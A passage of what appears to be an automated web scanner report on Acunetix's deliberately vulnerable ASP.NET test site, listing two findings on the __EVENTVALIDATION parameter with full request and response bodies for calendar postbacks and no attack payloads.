vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,123 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8531&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCA7amyUdsIZGRkECdLP1O6NFgHbTvOkNizZrdUKYI%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKvvuGYCgLQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0hGw7YgIiB6F5B29o7mCYubAod8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:25 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgCA7amyUdsIZGRkECdLP1O6NFgHbTvOkNizZrdUKYI=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKvvuGYCgLQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA0hGw7YgIiB6F5B29o7mCYubAod8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:White" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8616&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBACr99lNsIZGRkul%2BI%2BicguizPasOjOJYVZY0mWWQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKw0%2B%2BmDAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZ4OBTfhRP8t%2Btcos%2Fvt42ULHq0Ug%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:14:16 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgBACr99lNsIZGRkul+I+icguizPasOjOJYVZY0mWWQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKw0++mDAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogZ4OBTfhRP8t+tcos/vt42ULHq0Ug==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:White" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties 